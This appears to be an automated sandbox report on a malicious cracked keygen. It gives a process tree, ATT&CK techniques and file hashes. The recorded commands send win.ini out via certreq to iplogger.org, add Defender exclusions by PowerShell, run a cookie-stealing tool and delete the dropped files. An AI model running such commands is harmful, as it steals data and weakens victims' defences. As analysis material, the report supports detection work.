"C:\Users\Admin\AppData\Local\Temp\is-J69PR.tmp\Setup.exe" /Verysilent
10⤵
PID:5832

C:\Users\Admin\AppData\Local\Temp\is-FI9IS.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FI9IS.tmp\Setup.tmp" /SL5="$2035C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-J69PR.tmp\Setup.exe" /Verysilent
11⤵
PID:2636

C:\Users\Admin\AppData\Local\Temp\is-GO73A.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-GO73A.tmp\PictureLAb.exe" /Verysilent
12⤵
PID:5912

C:\Users\Admin\AppData\Local\Temp\is-GTR7N.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GTR7N.tmp\PictureLAb.tmp" /SL5="$30666,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-GO73A.tmp\PictureLAb.exe" /Verysilent
13⤵
PID:4600

C:\Users\Admin\AppData\Local\Temp\0v3sndro51k\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\0v3sndro51k\chashepro3.exe" /VERYSILENT
8⤵
PID:4456

C:\Users\Admin\AppData\Local\Temp\is-V934J.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-V934J.tmp\chashepro3.tmp" /SL5="$1034E,1478410,58368,C:\Users\Admin\AppData\Local\Temp\0v3sndro51k\chashepro3.exe" /VERYSILENT
9⤵
PID:5004

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1aSny7"
10⤵
PID:5208

C:\Program Files (x86)\JCleaner\mex.exe
"C:\Program Files (x86)\JCleaner\mex.exe"
10⤵
PID:5180

C:\Program Files (x86)\JCleaner\mex.exe
"{path}"
11⤵
PID:7628

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
10⤵
PID:5232

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1EaGq7"
10⤵
PID:5240

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
10⤵
PID:5248

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
11⤵
PID:5344

C:\Program Files (x86)\JCleaner\Venita.exe
"C:\Program Files (x86)\JCleaner\Venita.exe"
10⤵
PID:5212

C:\Program Files (x86)\JCleaner\Brava.exe
"C:\Program Files (x86)\JCleaner\Brava.exe"
10⤵
PID:5220

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
10⤵
PID:5228

C:\Users\Admin\AppData\Local\Temp\hlauoz2amwn\vict.exe
"C:\Users\Admin\AppData\Local\Temp\hlauoz2amwn\vict.exe" /VERYSILENT /id=535
8⤵
PID:2424

C:\Users\Admin\AppData\Local\Temp\is-PN164.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PN164.tmp\vict.tmp" /SL5="$1035C,870426,780800,C:\Users\Admin\AppData\Local\Temp\hlauoz2amwn\vict.exe" /VERYSILENT /id=535
9⤵
PID:4784

C:\Users\Admin\AppData\Local\Temp\is-K48FO.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-K48FO.tmp\wimapi.exe" 535
10⤵
PID:4560

C:\Users\Admin\AppData\Local\Temp\ly35kvc1jql\xqmvz3dfafk.exe
"C:\Users\Admin\AppData\Local\Temp\ly35kvc1jql\xqmvz3dfafk.exe" /ustwo INSTALL
8⤵
PID:4148

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "xqmvz3dfafk.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ly35kvc1jql\xqmvz3dfafk.exe" & exit
9⤵
PID:6760

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "xqmvz3dfafk.exe" /f
10⤵
- Kills process with taskkill
PID:6712

C:\Users\Admin\AppData\Local\Temp\1irrfmsko0l\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\1irrfmsko0l\vpn.exe" /silent /subid=482
8⤵
PID:4700

C:\Users\Admin\AppData\Local\Temp\is-MIET6.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MIET6.tmp\vpn.tmp" /SL5="$1036C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\1irrfmsko0l\vpn.exe" /silent /subid=482
9⤵
PID:4956

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
10⤵
PID:6668

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
11⤵
PID:6756

C:\Users\Admin\AppData\Local\Temp\vjlsxfacqpb\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\vjlsxfacqpb\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
8⤵
PID:4992

C:\Users\Admin\AppData\Local\Temp\is-H2IVM.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-H2IVM.tmp\IBInstaller_97039.tmp" /SL5="$20360,14441882,721408,C:\Users\Admin\AppData\Local\Temp\vjlsxfacqpb\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
9⤵
PID:5508

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
10⤵
PID:5972

C:\Users\Admin\AppData\Local\Temp\is-T4E9D.tmp\{app}\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\is-T4E9D.tmp\{app}\chrome_proxy.exe"
10⤵
PID:4396

C:\Users\Admin\AppData\Local\Temp\tixos3qqujd\aigutgplo3u.exe
"C:\Users\Admin\AppData\Local\Temp\tixos3qqujd\aigutgplo3u.exe" 57a764d042bf8
8⤵
PID:1912

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k "C:\Program Files\4K28S1JOWW\4K28S1JOW.exe" 57a764d042bf8 & exit
9⤵
PID:5668

C:\Program Files\4K28S1JOWW\4K28S1JOW.exe
"C:\Program Files\4K28S1JOWW\4K28S1JOW.exe" 57a764d042bf8
10⤵
PID:6176

C:\Users\Admin\AppData\Local\Temp\sdj1ns23w4m\app.exe
"C:\Users\Admin\AppData\Local\Temp\sdj1ns23w4m\app.exe" /8-23
8⤵
PID:5616

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Black-Dew"
9⤵
PID:4172

C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
4⤵
PID:4588

C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
4⤵
PID:4796

C:\Users\Admin\AppData\Roaming\F0FE.tmp.exe
"C:\Users\Admin\AppData\Roaming\F0FE.tmp.exe"
5⤵
PID:3568

C:\Users\Admin\AppData\Roaming\F0FE.tmp.exe
"C:\Users\Admin\AppData\Roaming\F0FE.tmp.exe"
6⤵
PID:4684

C:\Users\Admin\AppData\Roaming\F2B5.tmp.exe
"C:\Users\Admin\AppData\Roaming\F2B5.tmp.exe"
5⤵
PID:4224

C:\Users\Admin\AppData\Roaming\F2B5.tmp.exe
"{path}"
6⤵
PID:6704

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
5⤵
PID:5696

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:5716

C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
4⤵
PID:5768

C:\ProgramData\2024789.22
"C:\ProgramData\2024789.22"
5⤵
PID:4400

C:\ProgramData\7822039.86
"C:\ProgramData\7822039.86"
5⤵
PID:6024

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
6⤵
PID:6924

C:\ProgramData\111938.1
"C:\ProgramData\111938.1"
5⤵
PID:6040

C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
4⤵
PID:6252

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:5916

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:4168

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:4104

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C997A94FA401D7C38BF8A58D09D8EE1F C
2⤵
- Loads dropped DLL
PID:4156

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C018DA33AB2D26B8A2B98A612AFE119C C
2⤵
PID:4804

C:\Users\Admin\Desktop\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
"C:\Users\Admin\Desktop\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe"
1⤵
- Executes dropped EXE
PID:4380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen.bat" "
2⤵
PID:4504

C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
PID:4652

C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe"
4⤵
PID:5044

C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe -txt -scanlocal -file:potato.dat
5⤵
PID:5092

C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-1.exe
keygen-step-1.exe
3⤵
PID:4672

C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-3.exe
keygen-step-3.exe
3⤵
PID:4708

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-3.exe"
4⤵
PID:2864

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:4164

C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-4.exe
keygen-step-4.exe
3⤵
PID:4732

C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"
4⤵
PID:5068

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
5⤵
PID:4568

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"
5⤵
PID:2304

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
6⤵
- Runs ping.exe
PID:4920

C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"
4⤵
PID:4860

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:4376

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
PID:3004

C:\Users\Admin\AppData\Local\Temp\RarSFX4\Install.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Install.exe"
4⤵
PID:4188

C:\Users\Admin\AppData\Local\Temp\A83NKB8ZU3\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\A83NKB8ZU3\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
5⤵
PID:4100

C:\Users\Admin\AppData\Local\Temp\A83NKB8ZU3\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\A83NKB8ZU3\multitimer.exe" 1 3.1615300265.604786a98eaad 101
6⤵
PID:6032

C:\Users\Admin\AppData\Local\Temp\A83NKB8ZU3\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\A83NKB8ZU3\multitimer.exe" 2 3.1615300265.604786a98eaad
7⤵
PID:5140

C:\Users\Admin\AppData\Local\Temp\gbvmpzwryxq\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\gbvmpzwryxq\chashepro3.exe" /VERYSILENT
8⤵
PID:4212

C:\Users\Admin\AppData\Local\Temp\is-8IOQ7.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8IOQ7.tmp\chashepro3.tmp" /SL5="$304D6,1478410,58368,C:\Users\Admin\AppData\Local\Temp\gbvmpzwryxq\chashepro3.exe" /VERYSILENT
9⤵
PID:6300

C:\Users\Admin\AppData\Local\Temp\lae0odxomsp\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\lae0odxomsp\vpn.exe" /silent /subid=482
8⤵
PID:6184

C:\Users\Admin\AppData\Local\Temp\is-DA984.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DA984.tmp\vpn.tmp" /SL5="$70060,15170975,270336,C:\Users\Admin\AppData\Local\Temp\lae0odxomsp\vpn.exe" /silent /subid=482
9⤵
PID:6400

C:\Users\Admin\AppData\Local\Temp\lnkdq3mgwp5\app.exe
"C:\Users\Admin\AppData\Local\Temp\lnkdq3mgwp5\app.exe" /8-23
8⤵
PID:6684

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Young-Mountain"
9⤵
PID:7124

C:\Users\Admin\AppData\Local\Temp\1f4hfedmu2p\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\1f4hfedmu2p\Setup3310.exe" /Verysilent /subid=577
8⤵
PID:6160

C:\Users\Admin\AppData\Local\Temp\nqjrbbczsiu\1etg40wf0yq.exe
"C:\Users\Admin\AppData\Local\Temp\nqjrbbczsiu\1etg40wf0yq.exe" /ustwo INSTALL
8⤵
PID:4408

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "1etg40wf0yq.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\nqjrbbczsiu\1etg40wf0yq.exe" & exit
9⤵
PID:7368

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "1etg40wf0yq.exe" /f
10⤵
- Kills process with taskkill
PID:7728

C:\Users\Admin\AppData\Local\Temp\0oku0oeabkc\vict.exe
"C:\Users\Admin\AppData\Local\Temp\0oku0oeabkc\vict.exe" /VERYSILENT /id=535
8⤵
PID:4436

C:\Users\Admin\AppData\Local\Temp\kwj5ey5v44p\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\kwj5ey5v44p\askinstall24.exe"
8⤵
PID:4904

C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"
4⤵
PID:2896

C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
4⤵
PID:4528

C:\Users\Admin\AppData\Roaming\3BB3.tmp.exe
"C:\Users\Admin\AppData\Roaming\3BB3.tmp.exe"
5⤵
PID:5632

C:\Users\Admin\AppData\Roaming\3BB3.tmp.exe
"C:\Users\Admin\AppData\Roaming\3BB3.tmp.exe"
6⤵
PID:4832

C:\Users\Admin\AppData\Roaming\3E54.tmp.exe
"C:\Users\Admin\AppData\Roaming\3E54.tmp.exe"
5⤵
PID:6080

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
5⤵
PID:6584

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:6224

C:\Users\Admin\AppData\Local\Temp\RarSFX4\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\BTRSetp.exe"
4⤵
PID:6652

C:\Users\Admin\AppData\Local\Temp\is-I5K4A.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-I5K4A.tmp\vict.tmp" /SL5="$40334,870426,780800,C:\Users\Admin\AppData\Local\Temp\0oku0oeabkc\vict.exe" /VERYSILENT /id=535
1⤵
PID:6392

C:\Users\Admin\AppData\Local\Temp\is-LTR8M.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-LTR8M.tmp\wimapi.exe" 535
2⤵
PID:6532

C:\Users\Admin\AppData\Local\Temp\is-UL9NQ.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UL9NQ.tmp\Setup3310.tmp" /SL5="$4034C,802346,56832,C:\Users\Admin\AppData\Local\Temp\1f4hfedmu2p\Setup3310.exe" /Verysilent /subid=577
1⤵
PID:6384

C:\Users\Admin\AppData\Local\Temp\is-M3HE2.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-M3HE2.tmp\Setup.exe" /Verysilent
2⤵
PID:6460

C:\Users\Admin\AppData\Local\Temp\is-HJ6FE.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HJ6FE.tmp\Setup.tmp" /SL5="$305F4,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-M3HE2.tmp\Setup.exe" /Verysilent
3⤵
PID:6212

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
1⤵
PID:6432

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
2⤵
- Kills process with taskkill
PID:6964

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6744

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:7052

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

New Service

T1050

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Bootkit

T1067

Privilege Escalation

New Service

T1050

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\KMSAuto\bin.dat
MD5
4d2e5affe6d1ccb42f6650fd57448a9b

SHA1
2d2e279036d777e59b729e58f0b0e41da559067a

SHA256
3cbf7c0231b3266b4a6946dcf9aaa39c2bf077f6e459ca9ead39c516cbfce74c

SHA512
b33c25cd2fbc257ed2d6b41c5591288e81aee478248193b53e87c8f844689fa8cb507f27f844a9a8330f244f0bdea610565df16f214b2c4efe33448ddeeec756

Download Submit
C:\ProgramData\KMSAuto\bin.dat
MD5
4d2e5affe6d1ccb42f6650fd57448a9b

SHA1
2d2e279036d777e59b729e58f0b0e41da559067a

SHA256
3cbf7c0231b3266b4a6946dcf9aaa39c2bf077f6e459ca9ead39c516cbfce74c

SHA512
b33c25cd2fbc257ed2d6b41c5591288e81aee478248193b53e87c8f844689fa8cb507f27f844a9a8330f244f0bdea610565df16f214b2c4efe33448ddeeec756

Download Submit
C:\ProgramData\KMSAuto\bin\AESDecoder.exe
MD5
b90ed3e4dbb23a464723706f12c86065

SHA1
96aa9e1d2f2e51aaf094a268df19163cb94f623a

SHA256
8391d5b724d235ba52531d9a6d85e466382ce15cbd6ba97c4ad1278ed1f03bd7

SHA512
92e0f414f1eca28788c885cb193e6baccf37641bcdc120f4db5a80849a61c6bd861987631753a0a93149c669d5814d7b7a79f1cd5087480fbb31465be53bb992

Download Submit
C:\ProgramData\KMSAuto\bin\AESDecoder.exe
MD5
b90ed3e4dbb23a464723706f12c86065

SHA1
96aa9e1d2f2e51aaf094a268df19163cb94f623a

SHA256
8391d5b724d235ba52531d9a6d85e466382ce15cbd6ba97c4ad1278ed1f03bd7

SHA512
92e0f414f1eca28788c885cb193e6baccf37641bcdc120f4db5a80849a61c6bd861987631753a0a93149c669d5814d7b7a79f1cd5087480fbb31465be53bb992

Download Submit
C:\ProgramData\KMSAuto\bin\KMSSS.exe
MD5
01a80aad5dabed1c1580f7e00213cf9d

SHA1
174f9e420ab6c21e59ff7a0e42b8ebb3d742f0ec

SHA256
fd7499214abaa13bf56d006ab7de78eb8d6adf17926c24ace024d067049bc81d

SHA512
f254dfc103f79093bbae02d03d5906aafab7a94fa946373037407c270e67f0eb7972f8524cf2d98129bf6af2b8ba50f4ba0fb2b31d9d7b4dcb45d79e689d325b

Download Submit
C:\ProgramData\KMSAuto\bin\KMSSS.exe
MD5
01a80aad5dabed1c1580f7e00213cf9d

SHA1
174f9e420ab6c21e59ff7a0e42b8ebb3d742f0ec

SHA256
fd7499214abaa13bf56d006ab7de78eb8d6adf17926c24ace024d067049bc81d

SHA512
f254dfc103f79093bbae02d03d5906aafab7a94fa946373037407c270e67f0eb7972f8524cf2d98129bf6af2b8ba50f4ba0fb2b31d9d7b4dcb45d79e689d325b

Download Submit
C:\ProgramData\KMSAuto\bin\KMSSS.exe.aes
MD5
41e0d8ab5104da2068739109ec3599f4

SHA1
31aeec9aa396a677f54218f7310d8e627446bdd8

SHA256
38d1dbdc7c7a64253e6d4b52225b0bfd7716405c731a107f0c6ba9573a73a77f

SHA512
54afe0804dfd8ca9381fbbd23043250346120792611b04cc11caf089942001bcc97aa5e2d4433e81debb99a85696f6e2c389badff2710d6a52f4717fcde3e0a0

Download Submit
C:\ProgramData\KMSAuto\bin\TunMirror2.exe.aes
MD5
a1a5afa53b578db6abf400a88548f487

SHA1
b73ae3c93a43074afe54e611bad938da98eee385

SHA256
a9e76d637e0c0a65036d7f2d5c3d7b1c53218b94716554f4d9f6630dcff8c75a

SHA512
c9cff93b807d0db06d8a67e4e1b2e934f84a509a5f9af4bd0f4ad84eaec6874412c0c094c034d8637cacd3219bb7c82723a25f35907cba5024293e46991d4e2c

Download Submit
C:\ProgramData\KMSAuto\bin\driver\oas_sert.cer
MD5
0041584e5f66762b1fa9be8910d0b92b

SHA1
8788377c653a5b79ef04c05c15d3ca52d6253469

SHA256
bb27684b569cbb72dec63ea6fdef8e5f410cdaeb73717eee1b36478dbcff94cc

SHA512
fc32985bd3b626a1baa5353595a25d85339bc8aeb8f8d9fdd881e514d7f4cdd90fe5de273f702c9f673cd625a7e90cd3979d695d4daabe72fa952c8318f64b71

Download Submit
C:\ProgramData\KMSAuto\bin\driver\oas_sert.cer
MD5
0041584e5f66762b1fa9be8910d0b92b

SHA1
8788377c653a5b79ef04c05c15d3ca52d6253469

SHA256
bb27684b569cbb72dec63ea6fdef8e5f410cdaeb73717eee1b36478dbcff94cc

SHA512
fc32985bd3b626a1baa5353595a25d85339bc8aeb8f8d9fdd881e514d7f4cdd90fe5de273f702c9f673cd625a7e90cd3979d695d4daabe72fa952c8318f64b71

Download Submit
C:\ProgramData\KMSAuto\bin\driver\oas_sert.cer
MD5
0041584e5f66762b1fa9be8910d0b92b

SHA1
8788377c653a5b79ef04c05c15d3ca52d6253469

SHA256
bb27684b569cbb72dec63ea6fdef8e5f410cdaeb73717eee1b36478dbcff94cc

SHA512
fc32985bd3b626a1baa5353595a25d85339bc8aeb8f8d9fdd881e514d7f4cdd90fe5de273f702c9f673cd625a7e90cd3979d695d4daabe72fa952c8318f64b71

Download Submit
C:\ProgramData\KMSAuto\bin\driver\x64TAP1\OemVista.inf
MD5
87868193626dc756d10885f46d76f42e

SHA1
94a5ce8ed7633ed77531b6cb14ceb1927c5cae1f

SHA256
b5728e42ea12c67577cb9188b472005ee74399b6ac976e7f72b48409baee3b41

SHA512
79751330bed5c16d66baf3e5212be0950f312ffd5b80b78be66eaea3cc7115f8a9472d2a43b5ce702aa044f3b45fd572775ff86572150df91cc27866f88f8277

Download Submit
C:\ProgramData\KMSAuto\bin\driver\x64TAP1\OemVista.inf
MD5
87868193626dc756d10885f46d76f42e

SHA1
94a5ce8ed7633ed77531b6cb14ceb1927c5cae1f

SHA256
b5728e42ea12c67577cb9188b472005ee74399b6ac976e7f72b48409baee3b41

SHA512
79751330bed5c16d66baf3e5212be0950f312ffd5b80b78be66eaea3cc7115f8a9472d2a43b5ce702aa044f3b45fd572775ff86572150df91cc27866f88f8277

Download Submit
C:\ProgramData\KMSAuto\bin\driver\x64TAP1\OemVista.inf
MD5
87868193626dc756d10885f46d76f42e

SHA1
94a5ce8ed7633ed77531b6cb14ceb1927c5cae1f

SHA256
b5728e42ea12c67577cb9188b472005ee74399b6ac976e7f72b48409baee3b41

SHA512
79751330bed5c16d66baf3e5212be0950f312ffd5b80b78be66eaea3cc7115f8a9472d2a43b5ce702aa044f3b45fd572775ff86572150df91cc27866f88f8277

Download Submit
C:\ProgramData\KMSAuto\bin\driver\x64TAP1\devcon.exe
MD5
3904d0698962e09da946046020cbcb17

SHA1
edae098e7e8452ca6c125cf6362dda3f4d78f0ae

SHA256
a51e25acc489948b31b1384e1dc29518d19b421d6bc0ced90587128899275289

SHA512
c24ab680981d8d6db042b52b7b5c5e92078df83650cad798874fc09ce8c8a25462e1b69340083f4bcad20d67068668abcfa8097e549cfa5ad4f1ee6a235d6eea

Download Submit
C:\ProgramData\KMSAuto\bin\driver\x64TAP1\devcon.exe
MD5
3904d0698962e09da946046020cbcb17

SHA1
edae098e7e8452ca6c125cf6362dda3f4d78f0ae

SHA256
a51e25acc489948b31b1384e1dc29518d19b421d6bc0ced90587128899275289

SHA512
c24ab680981d8d6db042b52b7b5c5e92078df83650cad798874fc09ce8c8a25462e1b69340083f4bcad20d67068668abcfa8097e549cfa5ad4f1ee6a235d6eea

Download Submit
C:\ProgramData\KMSAuto\bin\driver\x64TAP1\tap0901.cat
MD5
c757503bc0c5a6679e07fe15b93324d6

SHA1
6a81aa87e4b07c7fea176c8adf1b27ddcdd44573

SHA256
91ebea8ad199e97832cf91ea77328ed7ff49a1b5c06ddaacb0e420097a9b079e

SHA512
efd1507bc7aa0cd335b0e82cddde5f75c4d1e35490608d32f24a2bed0d0fbcac88919728e3b3312665bd1e60d3f13a325bdcef4acfddab0f8c2d9f4fb2454d99

Download Submit
C:\ProgramData\KMSAuto\bin\driver\x64TAP1\tap0901.cat
MD5
c757503bc0c5a6679e07fe15b93324d6

SHA1
6a81aa87e4b07c7fea176c8adf1b27ddcdd44573

SHA256
91ebea8ad199e97832cf91ea77328ed7ff49a1b5c06ddaacb0e420097a9b079e

SHA512
efd1507bc7aa0cd335b0e82cddde5f75c4d1e35490608d32f24a2bed0d0fbcac88919728e3b3312665bd1e60d3f13a325bdcef4acfddab0f8c2d9f4fb2454d99

Download Submit
C:\ProgramData\KMSAuto\bin\driver\x64TAP1\tap0901.sys
MD5
d765f43cbea72d14c04af3d2b9c8e54b

SHA1
daebe266073616e5fc931c319470fcf42a06867a

SHA256
89c5ca1440df186497ce158eb71c0c6bf570a75b6bc1880eac7c87a0250201c0

SHA512
ff83225ed348aa8558fb3055ceb43863bad5cf775e410ed8acda7316b56cd5c9360e63ed71abbc8929f7dcf51fd9a948b16d58242a7a2b16108e696c11d548b2

Download Submit
C:\ProgramData\KMSAuto\bin\driver\x64TAP1\tap0901.sys
MD5
d765f43cbea72d14c04af3d2b9c8e54b

SHA1
daebe266073616e5fc931c319470fcf42a06867a

SHA256
89c5ca1440df186497ce158eb71c0c6bf570a75b6bc1880eac7c87a0250201c0

SHA512
ff83225ed348aa8558fb3055ceb43863bad5cf775e410ed8acda7316b56cd5c9360e63ed71abbc8929f7dcf51fd9a948b16d58242a7a2b16108e696c11d548b2

Download Submit
C:\ProgramData\KMSAuto\bin\driver\x64TAP2\devcon.exe
MD5
7f0c8f7b6f6d22ecd83013f2f26a71ae

